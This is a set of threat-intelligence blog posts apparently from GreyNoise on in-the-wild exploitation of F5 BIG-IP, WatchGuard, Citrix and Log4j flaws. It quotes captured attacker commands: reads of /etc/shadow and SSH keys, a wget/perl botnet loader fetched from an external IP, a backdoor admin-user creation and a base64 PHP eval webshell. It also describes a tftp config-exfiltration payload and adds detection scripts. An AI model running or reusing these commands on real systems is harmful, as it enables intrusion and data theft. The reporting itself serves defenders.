Threat Signals

Actionable intelligence on real-world threats as they unfold. Get insights into attacker behavior, infrastructure, exploitation of zero-days and n-days, temporal pattern, and geographic hotspots — all sourced from GreyNoise’s Global Observation Grid (GOG). Stay ahead of emerging threats, block malicious IPs, and understand what’s happening in the moment.

Exploitation of CitrixBleed 2 (CVE-2025-5777) Began Before PoC Was Public

GreyNoise has observed active exploitation attempts against CVE-2025-5777 (CitrixBleed 2), a memory overread vulnerability in Citrix NetScaler. Exploitation began on June 23 — nearly two weeks before a public proof-of-concept (PoC) was released on July 4. 

We created a tag on July 7 to track this activity. Because GreyNoise retroactively associates pre-tag traffic with new tags, prior exploitation attempts are now visible in the GreyNoise Visualizer. 

Key Observations

  • First observed activity: June 23, 2025
  • PoC released: July 4, 2025
  • GreyNoise tag published: July 7, 2025
  • CISA confirms activity with GreyNoise: July 9, 2025 (prior to KEV addition) 

Targeted Behavior 

Early exploitation attempts came from malicious IPs geolocated in China. Rather than exploiting indiscriminately, these IPs targeted GreyNoise sensors configured to emulate Citrix NetScaler appliances, suggesting deliberate targeting. 

CISA Confirmation 

On July 9, shortly after we published the tag, CISA contacted GreyNoise to confirm exploitation activity. CVE-2025-5777 was subsequently added to the Known Exploited Vulnerabilities (KEV) catalog. 

Recommended Actions

Defenders can dynamically block malicious IPs to reduce exposure and suppress alerts. 

The above list will stay updated as new IPs are observed attempting to exploit CVE-2025-5777.

GreyNoise has developed an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more about GreyNoise Block.

— — —

Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.


Observed in the Wild: F5 BIG-IP CVE-2022-1388

TL;DR 

  • As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability in the wild.
  • GreyNoise Trends exploit activity observed in the wild for CVE-2022-1388
  • Observed exploit techniques include a large number of file requests, credential stuffing, and admin user creation. 
  • Download the latest list of IPs trying to exploit this vulnerability here for use in analysis and temporary blocking

Vulnerability Overview - CVE-2022-1388

On 4-May-22, F5 Networks issued Security Advisory K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388, which allows an unauthenticated attacker to take control of an affected system. According to NIST’s National Vulnerability Database, CVE-2022-1388 carries a CVSS score of 9.8 CRITICAL out of 10.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services," F5 said in an advisory. "There is no data plane exposure; this is a control plane issue only."

The F5 Security Advisory identifies which versions are affected, and the company has issued patches for the flaw, as well as recommended temporary workarounds until the fixes can be applied. 

As of May 8, 2022, a number of security researchers started sharing evidence of their successful exploitation attempts:

Given the severity of the vulnerability and ease of exploitation, GreyNoise advises organizations to apply mitigations or patch immediately.

Observed In The Wild

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass:

As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability, CVE-2022-1388. 

Below are a set of observations from the GreyNoise Research team based on the mass exploitation activity for this CVE that we’ve captured via our passive global sensor network:

Scale of attacks

Although GreyNoise has seen a rising number of IP addresses using this attack, this is still a relatively low number when compared to the first week of the Apache Log4J Vulnerability CVE-2021-44228, which had up to 800 unique IPs in the first days of public proof of concept release. This is potentially because of the large number of devices with “F5 BigIP” in their title on Shodan and the large percentage of those that could be honeypots. Some honeypots lack crucial characteristics that this attack relies on, such as a server associated with the vulnerability like Apache or Jetty, and therefore are worthless to the attacker. 

Source of attacks

  • 30% of exploit traffic targeting F5 BigIP devices is coming through TOR, commonly used for source obfuscation.
  • 52 out of 123 of the IPs in the initial survey of traffic were new IPs to GreyNoise sensors. This indicates actors may have utilized new infrastructure to deploy their exploit scripts.

Figure 1: Timeline of date when source_ip was first seen

Exploitation techniques

A large number of file requests - using ‘cat’ and then a filename allows the attacker to read the files they are requesting. They can use this information as reconnaissance for further attacks.

    cat /root/.bash_history
    cat /etc/hosts
    cat /config/bigip.conf
    cat /var/ssh/root/identity
    cat /config/bigip_user.conf
    cat /var/ssh/root/authorized_keys
    cat /etc/shadow
    cat /var/ssh/root/identity.pub

A single f5 master key grab attempt (Source: https://support.f5.com/csp/article/K9420)

    f5mku -K

“Add to botnet” script - a small script starts by using ‘unset HISTFILE’ commands to stop the command history from being saved to the box. The script then reaches out to an external IP to get a file called “sitemap1.jpg”, and then runs that file as a perl script. That perl script adds the machine to an IRC-based botnet.

    unset HISTFILE;unset HISTSAVE;wget http://[x.x.x.x]/sitemap1.jpg;fetch http://[x.x.x.x]/sitemap1.jpg;curl -O http://[x.x.x.x]/sitemap1.jpg;perl sitemap1.jpg;rm -rf sitemap*\

Credential stuffing - we’ve seen an interesting approach to credential stuffing: a base64 encoded login string which decodes to admin:horizon3. @Horizon3Attack is the name of the group which first released their PoC for this exploit.

    Connection: X-F5-Auth-Token
    Host: 127.0.0.1
    Authorization: Basic YWRtaW46aG9yaXpvbjM=
    X-F5-Auth-Token: asdf

Exploit failures - we’re seeing some things that just don’t work. 

  • X-F5-Auth-Token set to values that won’t work - the most prominent of which takes the literal advice to “set the X-F5-Auth-Token to anything”.

User creation - the user created results in an admin role with a bash shell, giving the attacker potential command line access if the command actually creates the user.

    tmsh show running-config /auth user; tmsh create auth user syscron password MfWmK86skPwXiTG partition-access add { all-partitions { role admin } } shell bash'

Potential PHP eval script injection - a small script that remounts /usr read-write and overwrites the imgTui.php file internal to the F5 with a PHP eval stub, giving a potential PHP eval script injection. 

    mount -o remount -rw /usr;echo PD9waHAgQGV2YWwoJF9SRVFVRVNUWydUN01IeXJkM0w2J10pOw== | base64 --decode > /usr/local/www/xui/common/images/imgTui.php;mount -o remount -r /usr

  • The base64 decodes to <?php @eval($_REQUEST['T7MHyrd3L6']);

Indicators of Compromise

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass provides a downloadable list of all the IP addresses observed attempting to mass exploit CVE-2022-1388 in the past 24 hours.

Mitigation Actions

Patch

F5 recommends installing the patched versions of F5 BIG-IP that replace the releases known to be vulnerable.

Mitigation prior to patching

Until you can install the patched version of BIG-IP, there are several temporary mitigations you can apply:

  • Block iControl REST access - F5-recommended mitigations include blocking iControl REST access through the self IP address and the management interface
  • Modify BIG-IP httpd configuration - F5-recommended mitigation
  • Block mass exploit IP addresses - GreyNoise identifies a list of IP addresses attempting to exploit this BIG-IP vulnerability in the past 24 hours that you can block temporarily until you have had time to install the patched version of BIG-IP. The IP addresses can be downloaded from GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass in several formats, including JSON, CSV, TXT files, as well as dynamically updated URLs for use with Palo Alto Networks, Cisco, and Fortinet firewalls.

Additional Information

WatchGuard CVE-2022-26318 RCE Detection, IOCs, and Prevention for Defenders

GreyNoise has observed malicious activity targeting WatchGuard CVE-2022-26318

UPDATE 28-Mar-22: A new PoC was released today for CVE-2022-26318 on WatchGuard Firebox and XTM appliances. Here are a couple of links to watch for new activity:

Somebody has dropped the exploit for the pre-auth RCE (CVE-2022-26318) on WatchGuard Firebox and XTM appliances.

PoC: (NA) @GreyNoiseIO observed wild exploitation activity already.

Further analysis on
https://t.co/xZSSvvSNxB (Yassine Aboukir 🐐 , @Yassineaboukir, March 28, 2022)

---

As of February 27th, GreyNoise identified exploit activity targeting WatchGuard Firebox and XTM appliances. The logs of the associated traffic were shared with WatchGuard, who confirmed it was related to CVE-2022-26318. This vulnerability was published by NVD on March 3rd and was last modified on March 15th.

CVE-2022-26318 - On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.

There is currently no publicly available proof-of-concept for this vulnerability, and we have reason to believe that this is currently being exploited by a sophisticated actor.

Find our GreyNoise tag to track and monitor this activity: GreyNoise Search | GreyNoise Tags.

Diagnose, Remediate, Prevent, Investigate

WatchGuard has published a software patch for CVE-2022-26318 and included it in the same software update that addressed Cyclops Blink. The FBI, CISA, DOJ, and UK NCSC worked closely with WatchGuard to develop the remediation plan for Cyclops Blink, which can be found at https://detection.watchguard.com/. These steps objectively address both Cyclops Blink and CVE-2022-26318 by updating the Fireware OS to the newest version. It is strongly advised that the steps as outlined be followed in their entirety.

If you are exclusively addressing CVE-2022-26318 as part of network security operations, the relevant Fireware release notes and documentation on Firebox remote management best practices are linked below:

Indicators of Compromise (IOCs) & Detection

The following IOCs are provided to aid network security operations teams who may be unable to patch due to extraneous factors (such as those living with strict SLAs). Some artifacts of the observed payloads are described in an intentionally vague manner to prevent usage in offensive exploitation. As of this writing (March 17, 2022), no publicly available Proof-Of-Concept exploitation code is known to exist.

Observed CVE-2022-26318 payloads connect using a TLS wrapped TCP socket with a destination port of 4117, a port used for the management interface of WatchGuard products. An HTTP request is sent over the TLS connection.

Start Line

POST /agent/login HTTP/1.1

The URL path used for authentication for the WatchGuard management interface

Headers

Host: <victim_ip>:4117

This port is used for the WatchGuard management interface.

Content-Encoding: gzip

The body of the POST request is compressed with gzip

Content-Length: 673

Observed gzip compressed HTTP body payloads have a Content-Length of greater than 600 bytes.

For comparison, a well-formed benign authentication attempt to this HTTP path measures at just ~450 bytes prior to compression.

Body

The body of observed payloads is sent gzip compressed. Example payload compression attributes:

It is unclear at this time whether a gzip compressed payload body is necessary for exploitation.

Gzip

The contents of the gzip compressed payload contain a stream of data (named in order of appearance):

  • Large, malformed XML
  • A byte sequence that does not fall within the ASCII text range
  • Python code that is executed using /usr/bin/python /tmp/test.py

Python Code

This python code does the following:

  • Imports a cryptography library Fernet
  • Defines a Base64 encoded key uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk=
  • Reads the WatchGuard config file /etc/wg/config.xml into a buffer
  • Encrypts the buffer using the Base64 encoded key
  • Writes the encrypted buffer to a file /tmp/enc_config.xml
  • Executes a system command tftp -p -l /tmp/enc_config.xml -r <victim_ip>.bin 50[.]7.210.114
  • Deletes the local copy of the encrypted config /tmp/enc_config.xml

Additional Notes

  • If an HTTP body is gzip compressed, the last 4 bytes of the body may be cast as a Little Endian Unsigned Int32 value to get the uncompressed size of the gzip stream without needing to actually decompress the stream.
  • The Base64 Encoded key used in the python code (uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk=) was observed across multiple payloads.
  • One of the IPs attempting to exploit CVE-2022-26318 62[.]171.145.102 serves a branded login page:

  • One of the IPs used for exfiltrating the encrypted WatchGuard config 50[.]7.210.114 has the following DNS records pointing to it:
  • stream[.]gtf[.]club
  • stream[.]radioneformat[.]ru
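The ISIZE trick noted above, turned into a check a defender can run over a captured request (an added example, not code from the original post): it parses a raw HTTP request, confirms the /agent/login path, port 4117 and gzip encoding, reads the uncompressed size from the gzip trailer, and compares both sizes against the thresholds stated above. The two sample requests, the threshold constants and the function names are constructed for this example.

```python
import gzip
import hashlib
import struct

# Thresholds taken from the observations above: malicious bodies carried a
# Content-Length above 600 bytes, while a benign login to this path is only
# ~450 bytes before compression.
MAX_BENIGN_CONTENT_LENGTH = 600
MAX_BENIGN_UNCOMPRESSED = 450


def gzip_isize(body: bytes) -> int:
    """Uncompressed size recorded in the gzip trailer, without inflating.

    The last 4 bytes of a gzip member are ISIZE: the input length modulo
    2**32 as a little-endian unsigned 32-bit integer. Only meaningful for a
    single-member stream; a multi-member stream reports the last member only.
    """
    if len(body) < 18 or body[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    return struct.unpack("<I", body[-4:])[0]


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def assess_request(raw: bytes) -> dict:
    """Compare one request against the CVE-2022-26318 traffic characteristics."""
    request_line, headers, body = parse_request(raw)
    content_length = int(headers.get("content-length", "0") or 0)
    indicators = {
        "login_path": request_line.startswith("POST /agent/login "),
        "mgmt_port": headers.get("host", "").endswith(":4117"),
        "gzip_body": headers.get("content-encoding", "").lower() == "gzip",
        "oversized_content_length": content_length > MAX_BENIGN_CONTENT_LENGTH,
        "oversized_uncompressed": False,
        "uncompressed_size": None,
    }
    if indicators["gzip_body"]:
        try:
            size = gzip_isize(body)
        except ValueError:
            size = None  # declared gzip but not a gzip stream: leave unscored
        indicators["uncompressed_size"] = size
        indicators["oversized_uncompressed"] = (
            size is not None and size > MAX_BENIGN_UNCOMPRESSED
        )
    checks = ("login_path", "mgmt_port", "gzip_body",
              "oversized_content_length", "oversized_uncompressed")
    indicators["suspicious"] = all(indicators[k] for k in checks)
    return indicators


def build_request(body_plain: bytes, host: str = "192.0.2.10") -> bytes:
    """Construct a gzip-encoded POST to /agent/login (sample data for this example)."""
    body = gzip.compress(body_plain)
    head = (
        "POST /agent/login HTTP/1.1\r\n"
        f"Host: {host}:4117\r\n"
        "Content-Encoding: gzip\r\n"
        f"Content-Length: {len(body)}\r\n"
    )
    return head.encode() + b"\r\n" + body


# Constructed samples. The benign one is a 435-byte login; the suspicious one
# mimics the observed layout (malformed XML, non-ASCII bytes, a python launch
# line) and is made incompressible so its Content-Length stays large.
BENIGN_REQUEST = build_request(
    b"<login><user>admin</user><password>x</password></login>" + b" " * 380
)
_INCOMPRESSIBLE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(47))
SUSPICIOUS_REQUEST = build_request(
    b"<xml>" + _INCOMPRESSIBLE + b"\n/usr/bin/python /tmp/test.py\n"
)

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        print(name, assess_request(req))
```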

Please check out GreyNoise Search | GreyNoise Tags to track the latest activity for this vulnerability, and check back on this blog for periodic updates (we’ll add new information to the top of the page).

GreyNoise Tag Round Up | January 2022

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self Explanatory.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

Relatively new technology. It's interesting because “why would you scan the internet for that?” and there's no clear motive - that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

Critical vulnerability in MS Windows’ http.sys kernel module.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely popular server management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:

See it on GreyNoise Viz

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances. References:

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution in Apache Druid v0.20.0 and earlier. References:

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier, CVE-2021-45046 affects versions 2.15.0 and earlier. References:

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel, which can lead to elevated privileges and remote code execution. References:

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, an unintentionally allowed master token access which can lead to remote code execution. References:

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:

See it on GreyNoise Viz

Log4j Analysis - What to Do Before the Next Big One

Over the past month, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228) announced in early December. Between blocking exploitation attempts and trying to determine vulnerable assets, it had already been a long winter for defenders. This vulnerability is particularly challenging as the Apache Log4j library has been used within so many different applications worldwide that it created an unusually large surface area for security teams to identify and defend. Now that the initial shock of the vulnerability is over, we wanted to answer some questions received during the exploit surge and identify a few preventative strategies that might help during future outbreaks.

What does scanning for Log4J look like now?

Figure 1: Log4j-related activity from December 10, 2021, to Jan 12, 2022. ‘Attributable’ activity describes individuals or organizations that voluntarily provided self-attribution while scanning for Log4j

As of January 2022, a month after initial CVE announcement, GreyNoise still observes a significant volume of traffic related to the Log4j vulnerability. This traffic is primarily composed of generic JNDI string exploit attempts with known obfuscations.

One of the interesting patterns we saw during the first few days of the Log4j “scan-and-exploit” outbreak was a huge surge in benign actors scanning for the vulnerability. The chart above shows Log4j-related activity broken down by scanners who provided attribution (generally benign scanning done by security firms, researchers, and academics) compared to non-attributed scanning (generally, malicious scanning by threat actors).

A huge part of the surge in scanning activity during the first days of the outbreak can be attributed to benign actors. Within the security community, there is significant discussion about the appropriateness of this scanning volume, as security teams further struggled with the alert volumes generated by this traffic during an emergent situation. It’s controversial enough that some in the security community are advocating blocking these types of scans.

Should I block the IPs that are scanning?

That depends. GreyNoise tracks internet noise caused by IPs scanning the entire internet, and classifies them as malicious, unknown, or benign based on their behavior and identity. For example, security vendors that scan the internet to identify vulnerable systems who voluntarily provide self-attribution are generally classified as benign. Other IP addresses that do opportunistic or unsolicited scanning, vuln checking, or exploitation are generally classified as malicious.

Note that organizations are not obligated to allow scanning of their network perimeter, regardless of GreyNoise classification. The value added by allowing or not blocking any IP seen by GreyNoise will vary depending on an organization’s threat model and security posture. The intended purpose of most benign traffic observed by GreyNoise is often to provide context, awareness, and added value to the IT and InfoSec community. However, any significant volume of unsolicited traffic, even that classified as benign by GreyNoise, may result in SOC alert fatigue and dangerous distraction during an active attack.

Does the GreyNoise tag capture the newest versions/latest associated vulnerabilities?

Mostly. The GreyNoise Log4J tag utilizes the presence of a JNDI format string within a packet’s body to tag IPs. The tag focuses on the core cause of the Log4j vulnerability, common to all the CVEs related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). As a result, the GreyNoise tag has no false positives and provides substantial coverage for relevant CVEs.

However, GreyNoise researchers have observed at least two examples of attempted Log4j exploits where the malicious string was base64 encoded in an application-specific parameter, allowing it to circumvent the GreyNoise tag.

See the following for more details: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter
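A tag-style JNDI check that also covers the base64-in-parameter evasion described above (an added example, not GreyNoise's own tagging logic): it looks for the JNDI format string in the raw request, then again in each query, header and form value after URL decoding and after base64 decoding. The sample requests use a TEST-NET address and are constructed for this example; the function names are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, unquote, urlencode

# The tag keys on a JNDI format string; this check does the same on the raw
# request and then on each parameter value after URL and base64 decoding,
# which is the evasion described above.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def try_base64(value: str):
    """Decode value as (standard or URL-safe) base64, or return None."""
    candidate = value.strip()
    if len(candidate) < 8 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", candidate):
        return None
    candidate = candidate.replace("-", "+").replace("_", "/")
    candidate += "=" * (-len(candidate) % 4)
    try:
        return base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def extract_values(request: str) -> list:
    """Collect query-string, header and form-body values from a raw request."""
    head, _, body = request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    target = parts[1] if len(parts) > 1 else ""
    values = []
    if "?" in target:
        values += [v for _, v in parse_qsl(target.split("?", 1)[1], keep_blank_values=True)]
    for line in lines[1:]:
        _, _, header_value = line.partition(":")
        values.append(header_value.strip())
    if body:
        values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    return values


def find_jndi(request: str) -> dict:
    """Report where a JNDI lookup string appears: raw, in a decoded value, or base64."""
    result = {"raw": bool(JNDI_RE.search(request)), "parameter": False, "base64": False}
    for value in extract_values(request):
        if JNDI_RE.search(unquote(value)):
            result["parameter"] = True
        decoded = try_base64(value)
        if decoded is not None and JNDI_RE.search(decoded):
            result["base64"] = True
    result["hit"] = result["raw"] or result["parameter"] or result["base64"]
    return result


# Constructed samples (TEST-NET address, no real callback host).
LOOKUP = "${jndi:ldap://203.0.113.5/x}"
RAW_SAMPLE = (
    f"GET /?q={LOOKUP} HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/7.81.0\r\n\r\n"
)
URLENC_SAMPLE = (
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fx%7D HTTP/1.1\r\n"
    "Host: app.example\r\n\r\n"
)
_body = urlencode({"user": "alice", "payload": base64.b64encode(LOOKUP.encode()).decode()})
B64_SAMPLE = (
    "POST /login HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(_body)}\r\n\r\n{_body}"
)
BENIGN_SAMPLE = (
    "POST /login HTTP/1.1\r\nHost: app.example\r\n\r\nuser=alice&token=c2Vzc2lvbi0xMjM0NQ=="
)

if __name__ == "__main__":
    for name, sample in (("raw", RAW_SAMPLE), ("urlencoded", URLENC_SAMPLE),
                         ("base64", B64_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, find_jndi(sample))
```

The base64 pass only fires on the JNDI string itself, so a plain base64 session token, as in the benign sample, does not trigger it.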

Can I get payload data? Pcap?

Not usually. GreyNoise does not currently provide raw sensor data for operational security purposes, although we may do so in the future. The GreyNoise Visualizer and APIs do expose select User-agents and URI paths.

That said, due to the high variance of payloads observed at the peak of Log4j activity in December 2021, GreyNoise researchers elected to curate and publish a unified list of payload examples:

https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

What’s next?

Application-specific attacks leveraging Log4j vulnerabilities. This Apache Log4j vulnerability has been extremely challenging due to the ubiquity of the logging library's use. CVE-2021-44228 had an enormous impact and drew significant attention to how the Log4j library was used within applications worldwide. This attention resulted in several follow-on CVEs that bypassed the initial patch and used varied attack vectors (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). Log4j-related exploit activity may evolve as security researchers continue to scrutinize the library and its usage across various applications. For example, application-specific vulnerabilities like those discovered in H2 Database Console and VMware may become more prevalent. (https://portswigger.net/daily-swig/researchers-discover-log4j-like-flaw-in-h2-database-console, https://www.vmware.com/security/advisories/VMSA-2021-0028.html) At this time, GreyNoise has not observed any notable trends or upticks regarding application-specific Log4j payloads.

There are more servers on the internet than there is IPv4 space to assign each of these servers a unique address. In the case of the HTTP protocol, hundreds of servers may share a singular IP address and only be reachable when a specific host header is set as part of the connection request. Scoping out this much larger section of the internet in relation to Log4j is a non-trivial task that remains to be fully explored. It is also one of the reasons the cyber defense search engine “Onyphe” opted against scanning the entire internet for vulnerabilities related to Log4j and instead opted for a more targeted approach.

Stay tuned to GreyNoise to help identify exploit outbreaks

While things are not as bad as they were in December 2021, we do not envision Log4j scanners and attackers disappearing anytime soon. At GreyNoise, our goal is to help identify these kinds of outbreaks as fast as we possibly can in order to give security teams the time and breathing space they need to get their defenses in place.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Trending Internet Scanning on Apache Log4j Vulnerability

Exploit activity for Apache Log4j vulnerability - CVE-2021-44228

UPDATE 16-Dec-21, 4:00 PM ET: Tentative results for #Log4Shell activity by hour showing "Researcher" and "Non-Researcher" breakdown as observed by GreyNoise. It may not be 100% accurate, but it should give an idea of what we are observing. "Researcher" is defined by IPs that GreyNoise knows to be attributable scanners for commercial or research purposes, usually listed as "benign" in our data. "Non-Researcher" is defined as everything else. The researcher numbers seem to flatline, but we believe this is due to the scale of the plot, and new infrastructure spun up by various researchers that have not yet been accounted for. We will try to update this later for a better retroactive understanding.

UPDATE 16-Dec-21, 1:00 PM ET: GreyNoise Research has compiled a set of sample Log4Shell (CVE-2021-44228) payloads observed in the wild. These samples are intended to provide individuals with a clearer idea of some of the variation we're seeing, including esoteric protocols such as IIOP. https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305

UPDATE 15-Dec-21, 11:00 PM ET: As of 15-Dec-21, GreyNoise Research is seeing a decrease in the number of unique IP addresses scanning for the Apache Log4j vulnerability.

Figure: Log4Shell Unique IPs per hour, Source: GreyNoise Research

On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of DevOps frameworks, enterprise IT systems, and vendor software and cloud products.

GreyNoise first observed activity for this vulnerability on December 9, 2021, from 194.48.199[.]78 and 181.214.39[.]2.

Source: GreyNoise Research, Twitter (https://twitter.com/_mattata/status/1469144854672379905)

